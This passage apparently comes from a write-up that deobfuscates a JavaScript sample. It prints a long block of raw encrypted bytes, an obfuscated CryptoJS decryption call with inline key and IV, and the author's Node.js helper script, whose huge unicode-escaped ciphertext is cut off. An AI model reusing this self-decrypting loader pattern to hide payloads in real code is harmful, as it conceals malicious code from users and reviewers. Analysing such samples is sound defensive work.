ÓG<jŒ(ÜòA¯2‡Ž¬÷}'L—³Ñ··Uì%‚ªÐ¾h\"Àãs¡¾ÛÃH“6CFœ$?ú[;êïÁ`¡–Ý™ñuÜO„êùd\n“Nø¨ã?¸iü~åg?¹§éŠTiŽó™x‰à	ÎÇùªžÄß;e(™Ud eÏoŠÞ`êØúÑôÊÊÇÑl+¯ÇÁ¨œê\r¹Xú¼“+oÈ;qc#{ëx4dœ1¿BÏQ§>¡_uó&›Õ&þw8…áۖ àžº5Ý]• Üà?ÇR«ìÀ!»‡03ñ§Žb¿.vPÎ\\\\EŒi¹,„€_ݹ0M\\ý*Í­ïˆÈ_ïîI¶Â£”»ñ*.?ÀlHÒVàJOQãŔ×áJ!A†DÊãؕ þžÂá^¿»¤nH¶,grb·óB‚ŒæI¬÷(¾<ã]Wósø§O™b)=É‹×Ɖ™ß¸ú«‰dU`b[Ñæ:²ÞE½ƒ}ÜðÛÁÑíAWі2Ê\"š`ýC¨s‚A7[Ëws<rÍè~‹XÕŠÁÓP,eðÎ æZž·|¾BEoÜ.ÖøºZ«<%ŒY4œg²“ßç•O¸F\r–,Öyúp>­þ#'ÃöÑ×Õ÷½HÏ—b£^+“N{ùÔÓd×÷Àƒ¡¬Áð»5o2`;ËØQBüñ&<˜ClÑn·$BÎM@=’¨«ÆÐxïy:i.þ‰#ú…·Ró}nÒzÐ[‹Ý|Ü.~’ÐeÎßþÌ=À¡ÂÖ £fÝÍÌäcàÝó\rumf\n­ÒŒ°ÈDZkÜÌÀ¡er¼D“À¨÷¹©‘¸I]ǵ*AK@6œF¦Á5ÐíºÊr‰ÜJgoð	‰îÀE”=´oiGÄ]¸á¼è[ р²Ü&Ë1•/RQe°í²)þ‡³+¿¡4HÃuL™®×ÌHóՊ!忼µZæ×ã$\\îŠkŒñLD‘Nå\r琁k綊˻kQ6ñ•1IMpÑ1>¨_™„‘Ä5þÏ†Âà“i1@¸ÎòÇÏS§µ˜e\\ØÿA³ûKò:µÈg®d’aü_ã@¸ü«X‘Ii‰§8HvØ{glª•öàh\rrùä’quîð¯ia¿œÞ§Ý»Ëo<kƒïúZüÿ“—ëS&÷§Jתز=܆<»ZÕ°Ëañµ?£8ìÞIò÷¶¼^Ú.S`è[ÇôºNf3QˆÑÁ\"«„».—ë-u%7x^ò‡Hg¹ˆ1œ\rŠ]QÈÕ}¢û¼ÜB-þê/ñ/i!ÁT@…kÑ()}Y¶oDùö²y‘wÔ@ȅ7ŠL4Ԛ/ðXöú¶”‰ºåãXrå3‡?ã0!û4ÈàD~:ÏÈ-¾¤›`LwÎSÎÕä2´2JŸÑähÉ{˜ôt.ô‚—Ö‚I¿wW·ˆ‡ä’66vu/(“Ž‰Kh‘—¼_<ꍔÐÌPØÁštŸdˉDëNJϚú‡	nËÏý%™·£T)ʽ€\\qg@.‹]tn‘’5“ô\nà1Ò9î½×cö–b÷_†QRÞ!.•ðXV€LÙbˆ›•F÷Ø·vƒÀí]A˾ÖÏ0o2¦-uª<	òÇ»ÏÉÃRÍ?gòkµÞH:Ž¢ä½¿•Ù{Ï~?‚°A¬¬‘KZ89ÔÊé€ÍÚåÑGú~äêلC™¿§Ø·NßT`€åHDåÒW“Ç÷  'R͜Òjâé Ñ¬÷ÈéÈF™†e´~~|ñ¹éc®DýpÅØؙ¥CÔ©`# Öý\r¿îf‹•Ÿrá¡—ß|ú†âÙ—ñÐ<&O:äÍìn!óñX*(Ëk¶xô’¸˜–è¨O|„bï´Í¦I9Ï;»qPÂΊXú4À_zælzÂWC¦S&`¦SžâéGH‰•ò¾~lLæ$¬êN²7I,±¹Á…ÉêÕW:¦3ÉiÜ\n+Žë13ømYÀuéVŸs“´çxÃr0?hfö+”Dg¥œ8™ÚÆãaÑ]µâÆ‡û=©(\r}úlÒ¹~’•r>µ{®—å]‘œSá‹å¥öéówɬdòï´`€~Ïû¤8%2¥ÎF݇Tw6jI$¼M'9b4×mÅ&rhîÝú’nÎ]øõ{ú\"ÓMR¬t_*ELChf,j<wŒmý8ј§“¶è£ñ|™çwÊa?A'âæ|é°n™Ñ¹ÜÍÞJõ&|*dŒhÿ?s;‚˜‰y˜²¡¸7ôê<S*sQsù¥4€^¾éÔíš#,6LÕ՞1…ÚC-ü´¹Éoê1Qôß9XŒSp@úâ„Û¤\rjthh›V-Ì+T&øÛ¬¯§û¨Ï6ö•r´²T_™»Ìl`‡|ªÊ˗P·,…IVÌ!–é>qŠ·‡ÑC·(ï‘eǏ[^肄á6$¹ÛúX<]xäléõ ç	àb$BÍ[· =ÃÝZ@1‰Å\"ö>TRÁ™C¿Â¤8ÊĹiDÞ…©Ëó˜CÈÁOk%óÁìŽzËÓ?ª÷Ä~èº	[x^ñ¢k+CŸÐ2øüm¡&ù“m'ø‹ãÊ;„\\6’©ˆÓB'؏!Ð Ô\rˆøEñ‰ˆ[Ç1O#Û/U2ž˜RÆM¶Øz2ô-§è†f<ìLv÷ àLˆT0øûÊP;™[Ð6_,?¼h{E¹£ä×¹ËëKò…ê'e\rmtõ{ŞÍyÅ'Ô*ØWZJZC´¦YàûŠ	¼ä_G’·­,Rs;q²ÀÒ)1(×	uøÏí›zcØ\\¹ª£UÖpã+‰N¶ü×V;ò¸»ÿˆ¶	œi jǓ‘|kjɤ€km1}NbGǂј›GwBÇZ?ù_p¯î†–¸©&‹¼+ĄR&'„kJù@Ç\"e:yIƒêCäÀ«6~a.-÷‹FП¢g»”Í¡Iâ‚CŸ©ºQÿ`ôcl䛢iÛªð‹€ÕΏjv‚04±žžÒŸ­Œ±ëcÜòG(¬ôïT;f±ÿŒ{/tH$FGŠ2æôB¨™ï@Òò“èfóXá¥Øµìõ@Ÿìe\ræ×nk	|?ÓÈùžçt^ªƒê©é3Û؁—‰`°£ÚhŸÌT;5ŸôbûõmÅàÍ€0ßBs®3¥ŸÙV°–Ä/@*¶°S·«!?TÇj¥¼hÌ°£K'l¡5(ÑWjfTGà|9yVkÎË‚«왣 ¹½©šbñAÜÏiv°mºöÑIùM1•Å¼qÐÕc´'¦QKâ†&ï:¶[µ2¨IÖó,5z|ku6ù«£²½NñIÜЬt¹	ï)´uÝXŒ¾]AsLì)\rџ=Ìó98Ø¥TD]r˜_͒¡£¯Ó†ð¼kåñÎSµÒUÆR@>^Šìœ,ÕêÆW@`‹è Œ!¼*;(¢w£ëæ5h$˜ªý–KëTI`²U¿lkª¿ì²¹©)†h7FbÅô‰ýEŸ&\\?\\'ó¿œÉf~[CÚ—pe")))}, CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("Ûí˜l±‰¡G•òŠ³¯L-²7)ÏT¼“"))), {iv: CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("äu&ÊJ7/8	üÆ\r")))}).toString(CryptoJS[_$_9b39[4]][_$_9b39[5]]));

To make life easier, I had created a script to convert them to base64 first before deobfuscating it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
const CryptoJS = require("./crypto-js");

(function () {
    function unicodeToBase64(unicodeStr) {
        let decodedStr = unicodeStr.replace(/\\u([\dA-Fa-f]{4})/g, (match, grp) => 
            String.fromCharCode(parseInt(grp, 16))
        );
        return btoa(decodedStr);
    }

    var payload = "\u0062\u00FB\u0033\u00C0\u00DC\u005C\u0051\u001F\u0062\u00F0\u0023\u0053\u0013\u007F\u0014\u003D\u0022\u00D4\u0049\u009A\u00F5\u005B\u0040\u00D3\u004B\u008F\u009D\u00AC\u00C8\u0035\u0009\u0009\u0066\u005A\u0086\u0083\u007E\u003D\u00CA\u00E6\u00CD\u0043\u0001\u00ED\u00B9\u0020\u0003\u0056\u00D3\u0015\u0023\u0001\u00AC\u0001\u00F9\u009E\u0024\u001A\u00BE\u00DF\u007F\u004A\u00D7\u0030\u0064\u00C2\u008F\u00BE\u00C9\u0000\u0043\u0027\u0070\u00DD\u0050\u006B\u00A7\u0099\u00AA\u00BC\u00BA\u0010\u00C3\u0031\u005E\u00C3\u00A7\u0024\u00C3\u0065\u0069\u00DB\u00A1\u00A8\u0079\u0093\u00E0\u0056\u00BD\u00C4\u0095\u00A1\u0092\u000A\u0046\u007B\u00CB\u0076\u00B6\u004B\u00EC\u00AF\u0070\u0098\u008F\u008F\u004B\u0033\u0040\u00F0\u0074\u0061\u00F9\u0076\u0009\u00BF\u0015\u005A\u007A\u00BE\u00B6\u009D\u0049\u005B\u0028\u0028\u000B\u00DD\u0043\u0092\u009F\u00D6\u0043\u00A1\u0083\u002B\u00B8\u00E6\u006B\u003B\u002C\u000A\u00D9\u0019\u0078\u005E\u00E8\u0092\u00E7\u00FD\u0028\u0079\u0046\u004D\u00EE\u0074\u00B7\u00FD\u0094\u00A9\u0084\u00E6\u0085\u00A0\u00A8\u00E1\u00A7\u0044\u009A\u004C\u0021\u0050\u0056\u008B\u00CC\u00AA\u00EF\u0076\u0065\u00CD\u0021\u0001\u0075\u0041\u006F\u009D\u00CB\u006E\u00A5\u0055\u00F4\u0033\u0043\u000A\u0083\u005C\u00F4\u00D9\u0025\u008A\u0098\u003A\u00C6\u0088\u00E1\u0076\u0035\u00EF\u00F9\u00D4\u00BD\u004E\u0048\u0028\u0056\u0069\u0040\u003C\u00B1\u0086\u009E\u00E1\u00D9\u00BE\u0084\u005E\u0022\u0054\u0026\u00FE\u0006\u0022\u0000\u00D8\u0083\u0089\u00F4\u0075\u0078\u0052\u009C\u00DA\u0098\u0037\u00BA\u0004\u0016\u0046\u00A6\u00AD\u0088\u001B\u00D4\u0016\u000B\u00B6\u00BF\u002F\u0061\u00C9\u009A\u0056\u0048\u001C\u0085\u0080\u006D\u0031\u0066\u00F9\u00FA\u002F\u00F1\u0036\u0079\u0020\u00E7\u00B2\u002F\u00B6\u00B9\u001E\u00A7\u00AC\u0097\u00C5\u0015\u008B\u00CA\u005A\u008A\u009A\u0033\u001D\u003E\u0086\u006F\u0015\u0043\u0076\u0067\u000A\u00D0\u0007\u009B\u00A1\u00BB\u002F\u0026\u00CA\u0030\u00EB\u0023\u0093\u00C7\u001D\u00AC\u0057\u0073\u002F\u0028\u004A\u00A5\u00EC\u00D1\u005B\u0045\u0077\u0030\u0047\u0008\u0097\u00C4\u003B\u001C\u00CB\u00E9\u0033\u00E9\u0013\u007B\u00F6\u00D1\u00A4\u000A\u00AA\u0090\u008E\u0041\u005E\u000F\u00FA\u00AB\u00F4\u0068\u0087\u00C8\u009C\u00A6\u0037\u0083\u00EC\u0021\u0056\u00D8\u00B1\u0095\u0010\u00CC\u008D\u0023\u000F\u0074\u002F\u007B\u0085\u0037\u006C\u00D8\u00C8\u000C\u006A\u003A\u00B3\u0071\u0029\u00AC\u00B9\u004D\u0011\u00EF\u0097\u00F8\u00E2\u0044\u00E5\u00BF\u00FC\u0053\u00CF\u0026\u00CE\u00F2\u0046\u0059\u0017\u004D\u008B\u00F1\u002C\u0089\u00E1\u0056\u0040\u0058\u00A8\u00AC\u009B\u00F2\u0063\u0086\u0085\u0073\u009F\u00B4\u00B5\u00B3\u0041\u0037\u00F8\u0034\u009C\u00F4\u0088\u0059\u00D0\u008E\u004A\u00B5\u00C6\u0066\u0044\u0042\u0026\u00F2\u0008\u0090\u00F8\u0075\u00A5\u006C\u0041\u008D\u00B8\u0061\u00D4\u00E8\u0089\u00DD\u0087\u0087\u0014\u00C9\u0093\u0013\u00FC\u007D\u007E\u00E5\u0048\u0043\u002E\u002E\u004D\u00E6\u0078\u00FA\u00A1\u00F7\u008F\u0095\u00EC\u00B3\u006F\u003A\u00CF\u00A7\u00BF\u00F3\u0051\u0094\u008B\u007C\u00A0\u0030\u009B\u0019\u00C0\u00FE\u003B\u0052\u0041\u00CB\u00AF\u0008\u00E2\u00A8\u00A3\u0027\u0075\u00DE\u00A8\u00FF\u005C\u0054\u008B\u0069\u0019\u00F5\u007B\u00A0\u00CF\u0065\u0079\u00B6\u00FC\u0099\u0037\u0043\u007C\u00CD\u007F\u0068\u00E6\u00D3\u00E7\u0084\u0093\u0010\u0088\u000F\u00B8\u0040\u001D\u001B\u0038\u00CA\u0010\u0043\u0003\u0094\u00BD\u0076\u00AF\u000C\u000D\u00DA\u009D\u0049\u000B\u005F\u003E\u00A2\u00F3\u00D5\u0045\u00F8\u00DD\u001E\u0057\u0003\u0053\u0044\u006B\u009E\u003B\u00A7\u00DF\u004A\u001A\u0040\u0094\u0080\u00EC\u00E8\u009B\u0010\u00E6\u0040\u0079\u0057\u0020\u009F\u00FF\u001F\u0042\u006D\u0057\u0055\u00A1\u003F\u0091\u006E\u00D7\u00F7\u00A2\u0089\u00F2\u007A\u000D\u0088\u005E\u00CE\u002D\u00C5\u00C3\u0001\u0071\u002A\u007A\u003D\u009C\u00F5\u00C3\u0080\u00CA\u002D\u0069\u004B\u005B\u0061\u00CD\u0055\u000F\u009C\u00C6\u00E6\u00FB\u0038\u00A1\u00FB\u00D1\u00BA\u0062\u00BE\u0031\u0072\u00EF\u00C0\u00D6\u0056\u00FF\u00DA\u00FE\u00CA\u0081\u0001\u0072\u00BC\u0025\u0079\u00B8\u007F\u0055\u00C5\u0071\u008C\u000C\u00D4\u0059\u0030\u0022\u00CC\u00C8\u005D\u005B\u0077\u0009\u00A2\u0038\u0054\u0013\u003F\u00BC\u00CD\u001F\u0039\u00DE\u001A\u0046\u0057\u0016\u0045\u001F\u00FF\u001E\u002F\u002C\u0032\u00EA\u0029\u0035\u00A1\u008B\u001B\u00F7\u0048\u00D6\u000A\u004C\u009F\u0044\u0093\u00D2\u002B\u0023\u00F9\u0022\u0044\u001C\u0012\u00D6\u0061\u0097\u00AF\u004B\u001E\u00DC\u000E\u0033\u00F3\u00A1\u00FA\u0050\u00CE\u0000\u0024\u0086\u00C9\u0045\u0061\u00A7\u00BC\u0074\u0096\u0058\u0087\u00B6\u00D4\u006A\u0087\u00BB\u0027\u00D8\u00B6\u0045\u007D\u0030\u0097\u0089\u005D\u0034\u0023\u0042\u005B\u003D\u00A0\u0012\u00F3\u0032\u00EA\u0040\u006B\u0023\u00EA\u00A9\u003D\u006C\u0013\u009B\u007A\u0096\u00CA\u0023\u00CC\u009C\u001A\u0083\u0058\u0004\u0098\u005F\u008B\u0048\u0001\u0091\u00CF\u008F\u00D0\u004F\u0092\u0015\u0076\u00C0\u0078\u0072\u000D\u0071\u0001\u0022\u0063\u00B6\u007D\u00E9\u00D3\u004B\u00A7\u008F\u00ED\u00F7\u0016\u00AB\u002D\u00B9\u0001\u00F2\u008B\u00E9\u002F\u0062\u00EE\u003C\u008D\u0040\u0016\u00C0\u00A7\u0017\u0065\u00B9\u002F\u009E\u00DC\u00E4\u00BC\u00FD\u00E7\u0023\u002C\u0066\u000A\u0024\u008C\u00F2\u00E4\u00AE\u00A3\u00C1\u0068\u007D\u001E\u0058\u000F\u0081\u00D5\u0047\u0010\u005B\u000A\u002A\u00B6\u0041\u003A\u00A8\u001D\u00DD\u0091\u0008\u007C\u005D\u00E1\u0013\u0002\u0004\u00B8\u0087\u00FA\u0019\u0009\u00B8\u00C1\u0044\u005D\u006E\u007D\u000E\u0092\u001E\u0034\u008D\u0076\u00B7\u00D4\u009E\u0059\u004C\u00CD\u0011\u002D\u0047\u00A0\u00EA\u002A\u0098\u0039\u00A5\u00DF\u008F\u0041\u00FF\u0000\u00C6\u003B\u00E0\u0025\u00F4\u0005\u00C0\u00FB\u005B\u0013\u0090\u0038\u00FA\u0031\u0037\u00BA\u0011\u006E\u00DB\u009A\u00BD\u0074\u004F\u0047\u0039\u00B8\u0047\u001E\u00F6\u00BF\u0008\u00E7\u0029\u004A\u0031\u00C8\u009F\u0099\u0045\u009A\u00B4\u00FF\u0009\u0052\u00BC\u00FE\u00C3\u006A\u0092\u007D\u000E\u00E4\u00A8\u000B\u007E\u0054\u000E\u0088\u00B2\u0058\u00F5\u00DD\u0044\u0054\u00F9\u0067\u0072\u00B0\u00DD\u00F6\u0047\u00C3\u00D5\u00A3\u00AE\u003C\u0051\u003E\u00DE\u0019\u00BC\u0041\u0065\u0024\u0067\u0045\u0075\u002E\u0008\u0086\u00AF\u0037\u00CD\u008B\u0000\u0062\u0063\u0069\u00C4\u003B\u0065\u00F7\u008A\u00C9\u0043\u00FC\u005E\u0080\u0058\u0046\u002A\u0059\u0074\u00D0\u0041\u00D3\u0069\u0027\u0045\u0053\u0001\u00A7\u00F4\u0065\u003C\u00D5\u00CE\u008E\u0066\u0077\u00A1\u00D8\u003B\u00EA\u0054\u003F\u003B\u00EE\u00E8\u00BD\u00B6\u0040\u00FE\u0009\u0071\u00DA\u001B\u007F\u00D4\u0019\u003E\u0065\u0062\u00F1\u00CA\u00EB\u0073\u0004\u0061\u00A4\u00B6\u006B\u0002\u0082\u00AA\u00DA\u00DA\u00FA\u007B\u0093\u005E\u0053\u0080\u0049\u0017\u008E\u00ED\u00EF\u0058\u0016\u005D\u0041\u006C\u0015\u0088\u0088\u0085\u00A6\u004D\u0003\u00A8\u0014\u001C\u000B\u0085\u0049\u0042\u006A\u00DA\u006C\u00CD\u00DD\u00C3\u0049\u00F7\u00E4\u0049\u0049\u0027\u0018\u00E4\u00A8\u0045\u0069\u00F5\u000A\u0009\u0045\u00CD\u00BC\u0075\u0047\u009A\u0056\u00BE\u002A\u0026\u00C0\u00E8\u007C\u004E\u000D\u003B\u00E8\u0017\u00BA\u0098\u008D\u0008\u0062\u0047\u00EC\u00D4\u0005\u00AD\u003D\u0094\u008B\u00A0\u0023\u0054\u0016\u00A9\u0022\u00E9\u00DD\u007A\u0046\u00D1\u0022\u0074\u0020\u0006\u004B\u006F\u0099\u003F\u004E\u00B1\u001C\u00D6\u0081\u00D9\u001C\u003D\u0099\u0086\u00EA\u00EF\u0084\u0088\u0044\u0060\u004D\u0048\u0039\u0099\u0015\u00D8\u00D4\u0029\u009F\u00E2\u0056\u00E4\u001A\u0008\u0049\u00A3\u009C\u0056\u00AE\u00AC\u0052\u0089\u0002\u00D8\u00FB\u007E\u0078\u006D\u00AF\u00E9\u0065\u0020\u00A4\u00C0\u0013\u007D\u00C0\u0085\u0072\u00CF\u00FB\u00DD\u00F9\u00C3\u00A7\u0097\u000E\u0048\u003D\u00ED\u00A8\u0055\u00FA\u0070\u00F3\u001F\u0034\u0012\u00E1\u00C4\u000D\u00A1\u0055\u000F\u008D\u0000\u0039\u00BE\u0070\u0078\u0005\u0051\u0030\u00BA\u0023\u00C2\u00F8\u006F\u0045\u0098\u00B5\u00BE\u00A5\u0031\u0007\u0078\u0097\u0078\u00B8\u002E\u00C0\u0069\u0037\u0099\u0019\u00E3\u007D\u0025\u0003\u002B\u00EF\u0008\u00AD\u0055\u0094\u00E2\u009F\u0008\u0016\u0078\u0029\u00A7\u0067\u0059\u006A\u000F\u0080\u008D\u00A4\u001F\u0003\u00BD\u00AE\u0071\u0057\u0043\u0049\u00D4\u0034\u0012\u00AD\u0069\u00E3\u0085\u001F\u002B\u0063\u00BB\u00A7\u00DF\u005C\u00C6\u000C\u0076\u000B\u0006\u003F\u00D9\u0086\u00B5\u00D4\u0095\u00D8\u0064\u00E4\u00FA\u00F8\u0038\u0023\u008D\u00E6\u00A8\u0022\u00B6\u0047\u00DD\u005E\u00D6\u00CE\u001D\u0084\u003E\u0088\u00A5\u00C7\u0071\u004E\u0009\u00CA\u0023\u00A6\u0078\u00FD\u00C2\u0053\u003F\u00FE\u00A1\u002B\u0051\u0000\u00E6\u00FF\u00C5\u0045\u0073\u00BA\u0061\u004A\u00AE\u00C8\u00CF\u0006\u0036\u0044\u00FE\u0072\u00BF\u00B1\u005C\u0051\u00EB\u0003\u00C9\u00F3\u0020\u00B8\u0071\u00FA\u0046\u009D\u001A\u00D4\u000F\u0072\u0082\u0094\u0045\u0016\u000E\u00AA\u00F6\u00E2\u000E\u00A1\u001B\u008C\u000A\u0082\u0049\u003E\u0093\u00CB\u0087\u00CB\u00E9\u009C\u00B0\u0030\u0036\u007A\u00A6\u002A\u0016\u0020\u00DB\u00B1\u009E\u008E\u0003\u00A8\u008E\u005B\u005B\u0099\u001C\u00EA\u002E\u00AB\u000D\u005D\u00A3\u00A0\u00E8\u00CA\u00D7\u000B\u0081\u003D\u002F\u0039\u0083\u006F\u006B\u000D\u003A\u0025\u00CC\u00EE\u00DE\u006C\u0037\u007D\u0044\u0062\u0062\u0033\u0047\u0082\u00D9\u000D\u00A3\u0095\u00E1\u00F5\u0043\u00F3\u00A4\u00F3\u006E\u0071\u0019\u0021\u00D6\u009E\u000C\u0080\u0007\u00E7\u0076\u0034\u00AC\u0019\u0021\u0019\u002B\u00D3\u00C2\u00F2\u0072\u002B\u00C6\u00A8\u0043\u00F6\u00D9\u00B9\u004F\u0067\u0097\u0093\u007B\u0040\u001E\u0004\u0020\u00FC\u003F\u00D3\u00AD\u0079\u006E\u00E9\u008C\u00C7\u00EA\u00A7\u0009\u0054\u009D\u0030\u0088\u0044\u0016\u0017\u0061\u00DC\u00F6\u0057\u00C5\u0080\u001B\u0000\u0026\u0033\u0034\u0079\u009C\u0021\u00BC\u00A7\u0032\u0083\u00D7\u0082\u00CA\u0029\u0031\u0000\u0085\u0031\u0045\u0009\u0002\u00D9\u00F8\u0025\u00D8\u00E4\u0019\u0003\u00FA\u00B8\u00A5\u009B\u0093\u001F\u00FC\u00E6\u002F\u00F0\u0018\u00A3\u0021\u00E4\u0071\u001D\u0018\u0014\u00E9\u0027\u007A\u0070\u0072\u00D7\u002D\u00E2\u00A7\u0048\u00F7\u009F\u0072\u00E2\u00C7\u0094\u00A9\u00D4\u00E7\u0004\u0092\u00F1\u0076\u001D\u0031\u00E7\u009D\u00D3\u0087\u00EF\u00D4\u00D8\u00C5\u001F\u00FF\u008B\u00E9\u0041\u00EA\u00E9\u002D\u005A\u006C\u00A8\u008E\u0076\u0072\u0072\u0015\u003C\u00E6\u0004\u0005\u00A1\u00C7\u0001\u00EF\u00BB\u0055\u006E\u0030\u0017\u00E4\u0076\u00F9\u00FA\u002C\u0064\u008D\u00AE\u000D\u0097\u00D8\u0040\u005A\u00C4\u0039\u00E4\u006A\u0011\u0012\u00B5\u0061\u00FE\u0016\u001F\u00BA\u0070\u005A\u003A\u008F\u0033\u0091\u00F6\u0016\u00E2\u00E1\u0076\u0088\u00B3\u0007\u0068\u0032\u00CC\u0040\u00FB\u00E5\u0029\u008C\u0052\u00FC\u00CB\u000A\u00DF\u00EC\u00FB\u00AA\u0034\u003C\u00A1\u00D4\u00A1\u004B\u00C7\u0072\u006F\u00CF\u0003\u0004\u00D7\u002E\u00C9\u00B5\u0096\u008F\u00C6\u0039\u0045\u00A2\u008F\u0087\u0011\u0078\u0052\u00E8\u0080\u0086\u0091\u0082\u00AC\u00E5\u004F\u000B\u0040\u00EE\u0081\u00F4\u0025\u0001\u008E\u0019\u00B8\u00D2\u0052\u0028\u00ED\u00E5\u0029\u00DD\u0076\u000A\u0002\u00B9\u003F\u00D8\u000E\u00EB\u003C\u00DA\u00A1\u005A\u006E\u009E\u001B\u006A\u0034\u002A\u0071\u0083\u005C\u0011\u00E2\u00B9\u00A8\u0047\u0046\u00A9\u005E\u0056\u0088\u0053\u003E\u00ED\u0028\u0019\u001A\u00E6\u0050\u00AA\u0095\u0017\u000F\u00C3\u002D\u00C1\u0088\u004E\u0025\u007D\u0004\u0017\u0098\u005B\u0030\u00A1\u001E\u003C\u00FC\u007B\u00D1\u000B\u00C9\u00B3\u00A0\u002E\u0065\u0080\u0034\u0084\u0022\u00D4\u0079\u0053\u007D\u00D0\u0002\u005B\u00A2\u0060\u009B\u00BD\u000A\u006D\u009B\u007D\u00D5\u00A6\u0067\u00C8\u006E\u007C\u006B\u0090\u00C8\u000D\u00E4\u0026\u002E\u00BF\u0044\u0009\u00D3\u000F\u0047\u0001\u003C\u006A\u0012\u008C\u0028\u00DC\u00F2\u0041\u00AF\u0032\u0012\u0087\u0007\u008E\u00AC\u0011\u00F7\u007D\u0007\u0027\u004C\u0097\u0010\u00B3\u00D1\u00B7\u00B7\u0055\u000E\u001F\u00EC\u0025\u0082\u00AA\u00D0\u00BE\u0068\u0022\u00C0\u00E3\u0073\u00A1\u0006\u00BE\u00DB\u00C3\u0015\u0048\u0093\u0036\u0043\u0046\u009C\u0024\u003F\u00FA\u005B\u003B\u0015\u00EA\u00EF\u00C1\u0060\u00A1\u0096\u00DD\u0019\u0099\u00F1\u000E\u0075\u00DC\u0010\u004F\u0084\u00EA\u00F9\u0064\u000A\u0093\u008F\u004E\u001D\u00F8\u00A8\u00E3\u0016\u003F\u00B8\u001C\u0069\u00FC\u007E\u00E5\u0067\u003F\u00B9\u00A7\u00E9\u008A\u0054\u0008\u0069\u008E\u00F3\u000F\u0099\u0078\u0089\u00E0\u0009\u00CE\u00C7\u00F9\u000E\u00AA\u009E\u00C4\u00DF\u003B\u0065\u0028\u0099\u0055\u0064\u00A0\u0065\u00CF\u006F\u001A\u008A\u00DE\u0060\u00EA\u00D8\u00FA\u00D1\u007F\u00F4\u00CA\u00CA\u00C7\u00D1\u006C\u002B\u00AF\u00C7\u00C1\u00A8\u009C\u00EA\u000D\u00B9\u0058\u00FA\u00BC\u0093\u002B\u006F\u00C8\u001C\u0012\u003B\u0071\u0063\u0023\u007B\u00EB\u0090\u0078\u0034\u0064\u009C\u0031\u00BF\u001B\u0042\u00CF\u0051\u00A7\u003E\u00A1\u005F\u0075\u00F3\u0026\u009B\u0000\u00D5\u0026\u00FE\u0077\u0038\u0085\u000C\u00E1\u00DB\u0096\u0020\u00C3\u0005\u00A0\u009E\u00BA\u0035\u00DD\u005D\u0011\u0095\u0020\u000F\u00DC\u00E0\u003F\u00C7\u0052\u00AB\u00EC\u0001\u00C0\u0021\u00BB\u0087\u0030\u0033\u00F1\u00A7\u008E\u0062\u00BF\u002E\u0076\u0050\u00CE\u005C\u005C\u0045\u008C\u0069\u00B9\u002C\u0084\u0080\u005F\u00DD\u00B9\u0030\u004D\u005C\u00FD\u002A\u00CD\u0003\u00AD\u00EF\u0088\u00C8\u005F\u0008\u008F\u00EF\u00EE\u0049\u00B6\u00C2\u00A3\u0094\u00BB\u00F1\u002A\u002E\u003F\u00C0\u006C\u0048\u00D2\u0056\u00E0\u004A\u0008\u004F\u0051\u00E3\u00C5\u0094\u00D7\u00E1\u004A\u0021\u000C\u0041\u0007\u0086\u0044\u00CA\u0019\u00E3\u00D8\u0095\u00A0\u00FE\u009E\u00C2\u00E1\u005E\u00BF\u00BB\u0002\u00A4\u0002\u006E\u0048\u00B6\u002C\u000B\u0067\u0072\u0062\u0002\u00B7\u00F3\u0042\u0082\u008C\u00E6\u0049\u00AC\u00F7\u0028\u00BE\u003C\u00E3\u005D\u0057\u00F3\u0073\u00F8\u0010\u00A7\u004F\u0099\u0062\u0029\u003D\u0015\u009D\u00C9\u008B\u00D7\u0001\u00C6\u0089\u0099\u00DF\u00B8\u00FA\u007F\u00AB\u0089\u0064\u0055\u0060\u0062\u005B\u00D1\u00E6\u003A\u00B2\u00DE\u0045\u00BD\u0083\u0018\u007D\u00DC\u00F0\u001E\u00DB\u00C1\u00D1\u00ED\u0041\u0010\u0057\u00D1\u0096\u0032\u00CA\u0022\u009A\u0060\u00FD\u0043\u001B\u00A8\u0073\u0082\u0041\u0037\u0002\u008F\u005B\u00CB\u0077\u001B\u0073\u003C\u0072\u00CD\u00E8\u007E\u008B\u0015\u0058\u00D5\u0010\u0003\u008A\u0015\u00C1\u00D3\u0050\u002C\u0065\u00F0\u00CE\u0020\u00E6\u005A\u009E\u00B7\u007C\u0010\u00BE\u0042\u0045\u006F\u00DC\u002E\u00D6\u00F8\u00BA\u0019\u005A\u00AB\u003C\u0025\u00C2\u008C\u0059\u0034\u009C\u0067\u00B2\u0093\u00DF\u00E7\u0095\u004F\u00B8\u0046\u000D\u0096\u0015\u002C\u00D6\u0004\u0079\u00FA\u0070\u003E\u00AD\u00FE\u0023\u0027\u00C3\u00F6\u00D1\u00D7\u00D5\u00F7\u00BD\u0048\u00CF\u0014\u0010\u0097\u0062\u00A3\u005E\u002B\u0093\u004E\u007B\u00F9\u00D4\u00D3\u0064\u001F\u00D7\u00F7\u0018\u00C0\u0083\u00A1\u00AC\u00C1\u00F0\u00BB\u0035\u006F\u0007\u0032\u0060\u003B\u00CB\u00D8\u0051\u0042\u00FC\u00F1\u0026\u003C\u0098\u0043\u006C\u00D1\u006E\u00B7\u0024\u0042\u00CE\u0016\u004D\u0040\u0010\u003D\u0092\u00A8\u00AB\u00C6\u00D0\u0078\u00EF\u0079\u003A\u0069\u0018\u002E\u00FE\u0089\u0023\u00FA\u0085\u00B7\u0052\u00F3\u007D\u006E\u00C3\u0092\u007A\u00D0\u005B\u008B\u00DD\u007C\u00DC\u002E\u007E\u0092\u00D0\u0065\u0008\u00CE\u00DF\u00FE\u00CC\u003D\u00C0\u00A1\u00C2\u00D6\u0020\u0005\u00A3\u0066\u00DD\u00CD\u00CC\u00E4\u0063\u00E0\u00DD\u00F3\u0018\u000D\u0075\u0007\u006D\u0066\u000A\u00AD\u00D2\u008C\u008F\u00B0\u0006\u00C8\u00C7\u00B1\u006B\u00DC\u00CC\u00C0\u00A1\u0065\u001D\u0072\u00BC\u0012\u0044\u0093\u000F\u00C0\u00A8\u00F7\u00B9\u00A9\u0091\u00B8\u0049\u005D\u00C7\u00B5\u002A\u0018\u0041\u004B\u0040\u0036\u009C\u0046\u0002\u00A6\u00C1\u0035\u008D\u008D\u00D0\u008F\u00ED\u00BA\u00CA\u0072\u0089\u00DC\u004A\u0008\u0067\u006F\u00F0\u0009\u0089\u00EE\u0012\u00C0\u0045\u0094\u003D\u00B4\u006F\u0069\u0047\u00C4\u005D\u00B8\u00E1\u00BC\u00E8\u005B\u0020\u00D1\u0080\u00B2\u00DC\u0026\u